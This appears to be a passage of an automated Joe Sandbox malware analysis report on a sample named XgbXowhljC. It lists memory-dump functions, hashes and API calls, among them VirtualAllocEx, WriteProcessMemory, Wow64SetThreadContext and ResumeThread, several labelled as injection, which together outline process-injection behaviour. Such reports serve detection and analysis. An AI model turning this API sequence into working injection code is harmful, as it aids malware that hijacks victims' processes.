                                                                                        • Source File: 0000000B.00000002.2289919560.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_1000000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: c7f226c86d7406d21fb1ea9d601bf427d7c8d55d7671d34513422044a61bffde
                                                                                        • Instruction ID: 8a4ee005a2b5e5711f390ac58fa4d9a3ad83f7d0cf08e94ad69779b97c3f3e39
                                                                                        • Opcode Fuzzy Hash: c7f226c86d7406d21fb1ea9d601bf427d7c8d55d7671d34513422044a61bffde
                                                                                        • Instruction Fuzzy Hash: D741EFB0C0071DCBDB25DFA9C884B9EBBF5BF49304F60806AD448AB255DB756986CF90
                                                                                        Function 0100590D Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 653 100590d-1005913 654 1005918-10059d9 CreateActCtxA 653->654 656 10059e2-1005a3c 654->656 657 10059db-10059e1 654->657 664 1005a4b-1005a4f 656->664 665 1005a3e-1005a41 656->665 657->656 666 1005a60 664->666 667 1005a51-1005a5d 664->667 665->664 669 1005a61 666->669 667->666 669->669
                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 010059C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2289919560.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_1000000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: cf08d484a8d0827594c13a84c934bd2d7134af9686d7e4fee154b595ee3baa69
                                                                                        • Instruction ID: 815d29c86611805c2c7ef3774953e0b09ee2cf849f93385fa5a6b214a427b6a6
                                                                                        • Opcode Fuzzy Hash: cf08d484a8d0827594c13a84c934bd2d7134af9686d7e4fee154b595ee3baa69
                                                                                        • Instruction Fuzzy Hash: 224101B0C00719CBDB25CFA9C884B8DBBF5BF49304F20806AD408AB255DB756946CF90
                                                                                        Function 057F8622 Relevance: 1.6, APIs: 1, Instructions: 81threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 670 57f8622-57f8629 671 57f862b-57f8657 670->671 672 57f8676-57f86f7 ResumeThread 670->672 677 57f865e-57f8661 671->677 678 57f8659 671->678 679 57f86f9-57f86ff 672->679 680 57f8700-57f8725 672->680 681 57f8669-57f8672 677->681 678->677 679->680
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 622f7f2c14aa0d9bec263f9ef213bb89e7032cd69de01a96aab180408ea00e4b
                                                                                        • Instruction ID: c410be598558fad7745d583d2a399266352969b2c7de944eea2f0f485b01eff7
                                                                                        • Opcode Fuzzy Hash: 622f7f2c14aa0d9bec263f9ef213bb89e7032cd69de01a96aab180408ea00e4b
                                                                                        • Instruction Fuzzy Hash: CC3178B1D002489FDF10DFA9C8457EEBBF4EF88310F10846AD919A7351DB389941CBA2
                                                                                        Function 057F88C8 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 685 57f88c8-57f891e 688 57f892e-57f896d WriteProcessMemory 685->688 689 57f8920-57f892c 685->689 691 57f896f-57f8975 688->691 692 57f8976-57f89a6 688->692 689->688 691->692
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 057F8960
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: 73689e0e41756e278af12caba374e8824fdd99bef8b1ea9ca82669c63d3afb8d
                                                                                        • Instruction ID: 21da45c8f867278cd593a890c68e512790297edbe3bbb33533141f9c253a47af
                                                                                        • Opcode Fuzzy Hash: 73689e0e41756e278af12caba374e8824fdd99bef8b1ea9ca82669c63d3afb8d
                                                                                        • Instruction Fuzzy Hash: 332133B59003499FCF10CFAAC885BEEBBF5FF48310F10842AE919A7250C7789940DBA1
                                                                                        Function 057F88D0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 696 57f88d0-57f891e 698 57f892e-57f896d WriteProcessMemory 696->698 699 57f8920-57f892c 696->699 701 57f896f-57f8975 698->701 702 57f8976-57f89a6 698->702 699->698 701->702
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 057F8960
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: 2d370b5bfd8e768cfbd0d6d621db50f12a7f0910fc9b558c3f6a3a042164c85f
                                                                                        • Instruction ID: 40ff0d0546552c481709df17a914762d1f1d23559ffbade762590edd078fd3c3
                                                                                        • Opcode Fuzzy Hash: 2d370b5bfd8e768cfbd0d6d621db50f12a7f0910fc9b558c3f6a3a042164c85f
                                                                                        • Instruction Fuzzy Hash: DA2124B59003499FCB10DFAAC885BEEBBF5FF48310F10842AE959A7250C7789944DBA1
                                                                                        Function 057F8730 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 706 57f8730-57f8783 710 57f8785-57f8791 706->710 711 57f8793-57f87c3 Wow64SetThreadContext 706->711 710->711 713 57f87cc-57f87fc 711->713 714 57f87c5-57f87cb 711->714 714->713
                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 057F87B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: 31ed23ab34a450137a12950817560fdd2545367015bd1579176a64ef9060fbe5
                                                                                        • Instruction ID: 1a0b714babcf4ac7936e8bd8ec8645e26fde3570c6a45405b4aebf6c1a99a766
                                                                                        • Opcode Fuzzy Hash: 31ed23ab34a450137a12950817560fdd2545367015bd1579176a64ef9060fbe5
                                                                                        • Instruction Fuzzy Hash: 8C2145B29002099FDB10DFAAC485BEEBBF4FF49320F54842AD519A7341CB789945CFA1
                                                                                        Function 0100D6A0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0100D72F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2289919560.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_1000000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: ded137dde918b7318757592ee04fd5496ab4c339f4f052aebadcd25d7add1224
                                                                                        • Instruction ID: b785cf464b84efcfc61a75610e142d545c6b7f12b1e8b1f32d23d3edd9249912
                                                                                        • Opcode Fuzzy Hash: ded137dde918b7318757592ee04fd5496ab4c339f4f052aebadcd25d7add1224
                                                                                        • Instruction Fuzzy Hash: 4121E4B59003489FDB10CFAAD985ADEBFF8FB48310F14841AE958A3350D378A954CFA5
                                                                                        Function 057F89BA Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 057F8A40
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: 467e7695b3930f6684932c321f135d4177dd63bacc4a3b70cf34b1cff46f6da3
                                                                                        • Instruction ID: 643b9e31ac325911491119909667c55cf0fb0f6a8eaceb7e61350dcd4663757e
                                                                                        • Opcode Fuzzy Hash: 467e7695b3930f6684932c321f135d4177dd63bacc4a3b70cf34b1cff46f6da3
                                                                                        • Instruction Fuzzy Hash: DF2128B2C002499FCB10DFAAC881AEEFBF5FF48310F50842AE919A7250C7389544DBA5
                                                                                        Function 057F8738 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 057F87B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: 6d193e78046353261d20cd4da1d0a062f100e8b01d2c5cf724111fd946f5eab4
                                                                                        • Instruction ID: 11a23c447dcf2f8cf3a14e310d15de35d4017ebe2fd1052932939344075a4d9d
                                                                                        • Opcode Fuzzy Hash: 6d193e78046353261d20cd4da1d0a062f100e8b01d2c5cf724111fd946f5eab4
                                                                                        • Instruction Fuzzy Hash: 912134B1D002098FDB10DFAAC4857EEBBF5EF89324F10842AD519A7340CB78A944CFA1
                                                                                        Function 057F89C0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 057F8A40
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: b02e4e6b79be733b9b49baaf4a74c1206ed01c6006a00086ccc6e368d8c2e200
                                                                                        • Instruction ID: 5ce3d8d012265677239158bc101cce91b7846cd73b2cfbd50dda15fa20c1e28a
                                                                                        • Opcode Fuzzy Hash: b02e4e6b79be733b9b49baaf4a74c1206ed01c6006a00086ccc6e368d8c2e200
                                                                                        • Instruction Fuzzy Hash: CC21F5B1C002499FCB10DFAAC885AEEFBF5FF48310F50842AE519A7250D7799944DBA5
                                                                                        Function 0100D6A8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0100D72F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2289919560.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_1000000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 06d45faa61b700be8c6831557b051b1b129227c6714c1d057d159c83fae9569d
                                                                                        • Instruction ID: 86cefd1cf3cfd42b71281707222718025d838b0fc99e142b94964bed50a4587a
                                                                                        • Opcode Fuzzy Hash: 06d45faa61b700be8c6831557b051b1b129227c6714c1d057d159c83fae9569d
                                                                                        • Instruction Fuzzy Hash: BE21C2B59002489FDB10CFAAD984ADEBFF9FB48310F14841AE958A7350D378A954CFA5
                                                                                        Function 057F8808 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 057F887E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 78736fd55922f501374fda934dd2cd90497f1947d4754a28c71f8fc5a51a2053
                                                                                        • Instruction ID: 08fd26105bf129355b7ca2a2b95330e2eb9a09c9168fda6ec2ea73a7dfac7a05
                                                                                        • Opcode Fuzzy Hash: 78736fd55922f501374fda934dd2cd90497f1947d4754a28c71f8fc5a51a2053
                                                                                        • Instruction Fuzzy Hash: 2F1159768002499FCF10DFAAC844AEEFBF5FF48320F148819E519A7250CB39A940CFA1
                                                                                        Function 057F8810 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 057F887E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 4259133fd0ea9c521bac858edcee8d1fba6bb39f9d28980ce36bec78ea6c78b3
                                                                                        • Instruction ID: f46f3ace0c9609110af6a27bebf171f2aebfd8926569baaaf01f5a6432c06572
                                                                                        • Opcode Fuzzy Hash: 4259133fd0ea9c521bac858edcee8d1fba6bb39f9d28980ce36bec78ea6c78b3
                                                                                        • Instruction Fuzzy Hash: 2D1137718002499FCF10DFAAC844AEEBFF5FF48310F148419E519A7250C779A540CFA1
                                                                                        Function 057F8688 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 3043c7d036efa1bf5c8f1d237c6facac7a9d3410e3d3e3e42bf781bce182849d
                                                                                        • Instruction ID: 21ad824bf10a05f15723f986f1efa1d6bcc250432f04ee1986550e18f0b5b2df
                                                                                        • Opcode Fuzzy Hash: 3043c7d036efa1bf5c8f1d237c6facac7a9d3410e3d3e3e42bf781bce182849d
                                                                                        • Instruction Fuzzy Hash: F11128B1D002488FCB10DFAAC4457EEFBF5EF88324F208419D519A7250CB79A544CBA5
                                                                                        Function 0100B3B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0100B41E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2289919560.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_1000000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: 3e8c8ae44537371c832cf64fb697a4aff091679ef2847c657c918a055671b021
                                                                                        • Instruction ID: cf8c43c78908958eb2f07319866d51eb4359b5e8cc4cc41ce97787e676cf8d8c
                                                                                        • Opcode Fuzzy Hash: 3e8c8ae44537371c832cf64fb697a4aff091679ef2847c657c918a055671b021
                                                                                        • Instruction Fuzzy Hash: 531110B6C002498FDB10DF9AC444ADEFBF4EF88314F10845AD558A7350C379A645CFA1
                                                                                        Function 057FB8B9 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 057FB91D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        • Opcode ID: 0cb8e69cd6b60f4db7d9f41e22fe6810f24322fce1f8855b02addbc1e7b30158
                                                                                        • Instruction ID: 4e6aa6bd9d5ff321369e743d25a3275072acbbf40fa237a246fd7ee7213c6301
                                                                                        • Opcode Fuzzy Hash: 0cb8e69cd6b60f4db7d9f41e22fe6810f24322fce1f8855b02addbc1e7b30158
                                                                                        • Instruction Fuzzy Hash: DA11F5B58042499FCB10DF99D889BDEBBF8EB58320F10841AE918A7350C379A544CFA1
                                                                                        Function 057FB8C0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 057FB91D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        • Opcode ID: 606a63ef30ff9c5a27d07ed1f4238b802475d495a9baba027be64cb9eebba8f0
                                                                                        • Instruction ID: 86c151e89861c82650ebd5cc2d837750f0b8743b6e32feefcbf60f381df53da7
                                                                                        • Opcode Fuzzy Hash: 606a63ef30ff9c5a27d07ed1f4238b802475d495a9baba027be64cb9eebba8f0
                                                                                        • Instruction Fuzzy Hash: EC11CEB58042499FDB10DF9AD889BDEBBF8EB48320F10841AE559A7210C379A944CFA1
                                                                                        Function 00F9D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2284676551.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_f9d000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6e8f6634310b2532fc744c45d566dd178aaa37227d7f121701c2f849c65ea76a
                                                                                        • Instruction ID: 99ea0e58d3c0a59cd700f7b77ad1e9cb34cf5eda537b29bfef4ece9456a90120
                                                                                        • Opcode Fuzzy Hash: 6e8f6634310b2532fc744c45d566dd178aaa37227d7f121701c2f849c65ea76a
                                                                                        • Instruction Fuzzy Hash: BC21D672504204DFEF05DF18D9C0F26BF65FB98324F34C569D9090B256C33AE856EAA2
                                                                                        Function 00F9D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2284676551.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_f9d000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7cafb2a728b4a7abdd714e9a180246600dde18d7ddb1ca692c19db71b45e1de2
                                                                                        • Instruction ID: d33d770529746cfcb3c2c0d34964cfb2813db901e03e1fbf1a02415277dc5e8c
                                                                                        • Opcode Fuzzy Hash: 7cafb2a728b4a7abdd714e9a180246600dde18d7ddb1ca692c19db71b45e1de2
                                                                                        • Instruction Fuzzy Hash: 1B21F472900244DFEF15DF14D980B26BF65FB98328F34C569D9090B256C336D816E7A2
                                                                                        Function 00FAD01C Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2284755996.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_fad000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 351eec9894a26c1af9ee251d33709e5b6587e882d0b240d25ef1767eeeb128da
                                                                                        • Instruction ID: b2427368c5a40da79c5ea1af31fddedd8c4e35e63f0c6d443c2fa02466ff9d70
                                                                                        • Opcode Fuzzy Hash: 351eec9894a26c1af9ee251d33709e5b6587e882d0b240d25ef1767eeeb128da
                                                                                        • Instruction Fuzzy Hash: B921F2B5604204DFCB14DF24D984B26BF65FB89324F20C569D94A4B69AC33AD807EA62
                                                                                        Function 00FAD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2284755996.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_fad000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8440bebeb248e8d7388835224333ebf0c0d311a1d1c4b37954ac21c59a599580
                                                                                        • Instruction ID: d90d6c4133e45ee4df04fadaf0ae155eb557248fc2dfd141d70faad96ba7b98a
                                                                                        • Opcode Fuzzy Hash: 8440bebeb248e8d7388835224333ebf0c0d311a1d1c4b37954ac21c59a599580
                                                                                        • Instruction Fuzzy Hash: E82129B1904204DFDB05DF14D9C0F26BBA5FB85324F20C56DD90A4B756C33AD806EB61
                                                                                        Function 00FAD005 Relevance: .1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2284755996.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_fad000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bfac97522be1cd7614b78f2eeb6df341476410ba1c640c6ba06016a3b55e934a
                                                                                        • Instruction ID: d7eda8e9cfdc51d257d4907754b89648cc9c45d8612f893d1b094c43a87ba076
                                                                                        • Opcode Fuzzy Hash: bfac97522be1cd7614b78f2eeb6df341476410ba1c640c6ba06016a3b55e934a
                                                                                        • Instruction Fuzzy Hash: 152162755093C08FDB12CF24D994715BF71EB46314F28C5EAD8498F6A7C33A980ADB62
                                                                                        Function 00F9D4BF Relevance: .1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2284676551.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_f9d000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                        • Instruction ID: 3af952ecbdcc71d97f04250ed3a4e3f1a750a5d466aff7405ad6fabd46d4b69a
                                                                                        • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                        • Instruction Fuzzy Hash: E611DF76804280CFDF06CF10D5C4B16BF71FB98328F28C6A9D9490B256C336D85ADBA2
                                                                                        Function 00F9D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2284676551.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_f9d000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                        • Instruction ID: 7cf2deb46b2b7cb766afe752728b4af8bb7c39c00a22039409b6b9af3a039d8f
                                                                                        • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                        • Instruction Fuzzy Hash: C211DF72804240CFDF06CF04D5C4B16BF71FB94324F24C6A9D9090B256C33AE85ADBA2
                                                                                        Function 00FAD1CF Relevance: .1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2284755996.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_fad000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                        • Instruction ID: 3027d315f4144cfa6e2b4c46e1ccdb974bc23d7579ef68a300c8396fd7e15dd5
                                                                                        • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                        • Instruction Fuzzy Hash: BE11BEB5904240DFCB06CF10C5C4B15BBB1FB85324F24C6A9D84A4B666C33AD80ADB61

                                                                                        Executed Functions

                                                                                        Function 00440E80 Relevance: 24.3, Strings: 18, Instructions: 1846COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
